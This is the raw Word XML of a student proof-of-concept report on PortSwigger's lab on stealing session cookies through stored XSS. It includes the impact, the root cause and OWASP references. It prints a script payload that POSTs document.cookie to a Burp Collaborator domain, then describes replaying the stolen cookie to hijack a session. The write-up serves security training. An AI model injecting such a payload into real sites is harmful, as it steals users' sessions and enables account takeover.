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2F5496"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Topic 3 – Cross-Site Scripting (XSS) - Session Cookie Theft via Stored XSS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1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The objective of this Proof of Concept is to demonstrate how a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stored Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> vulnerability can be leveraged to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>steal session cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> from an authenticated user and subsequently </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hijack their session</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, without requiring credential theft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This PoC highlights how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trust placed in browser-executed content</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> combined with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>improper cookie protection</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> leads to complete session compromise.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2. Target Application Details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Site Name:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy – XSS Lab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URL:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId2" w:tgtFrame="_new">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies</w:t>
        </w:r>
      </w:hyperlink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Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Web Security Training Lab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Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Intentionally vulnerable web application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Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Demonstrate exploitation of stored XSS to steal session cookies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Environment:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Controlled lab environment (ethical testing)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3. Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> occurs when a web application allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unsanitized user input</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to be rendered and executed as JavaScript in another user’s browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session cookies are accessible to JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (i.e., missing the HttpOnly flag), an attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Read document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exfiltrate session identifiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reuse the stolen session to impersonate the victim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4. Proof of Concept – Step-by-Step Execution Log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6247130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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3.1 – Vulnerable Blog Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The target blog application allows users to submit comments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No visible input sanitization or output encoding is applied.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This indicates potential for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stored XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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identifies the comment section as an injection point.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4376420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3.2 – Attacker Not Authenticated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The attacker is not logged in to the application.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Confirms that authentication is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not required</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to submit comments.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proceeds as an unauthenticated user.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5121275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3.3 – Burp Collaborator Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Burp Collaborator client is opened.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Used to generate an external endpoint to receive exfiltrated data.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prepares an out-of-band interaction listener.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5677535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3.4 – Generated Collaborator Domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A unique Collaborator subdomain is generated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This domain will receive HTTP/DNS interactions from victims.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copies the generated Collaborator URL for payload use.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4622800" cy="5044440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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504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3.5 – Malicious JavaScript Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The following JavaScript payload is prepared:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t>fetch('https://&lt;collaborator-id&gt;.oastify.com', {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  method: 'POST',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mode: 'no-cors',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  body: document.cookie</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Payload reads browser-accessible cookies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Cookies are sent externally to the attacker.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prepares the payload for injection.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6254750"/>
            <wp:effectExtent l="0" t="0" r="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3.6 – Script Injection via Comment Section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The malicious script is submitted as a blog comment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Application accepts the input without sanitization.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posts the payload.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inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="4517390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3.7 – Stored XSS Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Application confirms successful comment submission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Script is stored server-side and becomes persistent.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XSS payload is now embedded in the application.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6156325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3.8 – Triggering Script Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A legitimate authenticated user loads the blog page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The stored script executes automatically in the victim’s browser.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Victim unknowingly executes attacker-supplied JavaScript.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3089910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3.9 – Collaborator Interaction Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Burp Collaborator records inbound DNS/HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirms outbound communication from victim’s browser.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verifies script execution.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6164580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4.0 – Session Data in Collaborator Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The HTTP request received contains document.cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Session-related data is visible in the request body.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extracts the victim’s session cookie.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6137910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4.1 – Session Reuse via Burp Repeater</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Captured session cookie is manually inserted into a new request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Burp Repeater is used to replay the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Action:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t>Attacker attempts session impersonation.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6240780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4.2 – Successful Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Application accepts the reused session identifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attacker gains authenticated access as the victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No credentials were entered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:t>Session hijacking is successful.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5. Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Complete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authentication bypass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Session hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> without credential theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Unauthorized access to victim account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Potential for data exposure and privilege abuse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exploitation scales automatically to all visitors of the affected page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6. Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Missing input sanitization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Stored XSS vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Session cookies accessible via JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Absence of HttpOnly flag on session cookies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7. Key Takeaway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This PoC demonstrates that:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stealing a session cookie is often easier than stealing credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, and once obtained, a valid session ID grants full trust from the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8. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PortSwigger – Exploiting XSS to Steal Cookies</w:t>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/exploiting/stealing-cookies</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PortSwigger – Cross-Site Scripting (XSS)</w:t>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_new">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>OWASP – Cross-Site Scripting (XSS)</w:t>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_new">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/xss/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>OWASP – Session Management Cheat Sheet</w:t>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_new">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink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060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849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49e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49e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49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49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49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49e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49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849eb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a849e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49eb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c29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29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849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49e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swigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookie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yperlink" Target="https://portswigger.net/web-security/cross-site-scripting/exploiting/stealing-cookies" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/xss/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html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72D17-B658-47F7-82E2-C66F653F0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LibreOffice/25.8.4.2$Windows_X86_64 LibreOffice_project/290daaa01b999472f0c7a3890eb6a550fd74c6df</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>15</Pages>
  <Words>701</Words>
  <Characters>4576</Characters>
  <CharactersWithSpaces>5162</CharactersWithSpaces>
  <Paragraphs>123</Paragraphs>
  <Company>Boston Institute Of Analytics – Cseh-Aug2025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2025-12-20T15:22:00Z</dcterms:created>
  <dc:creator>Omkar Sawant</dc:creator>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-21T15:09:15Z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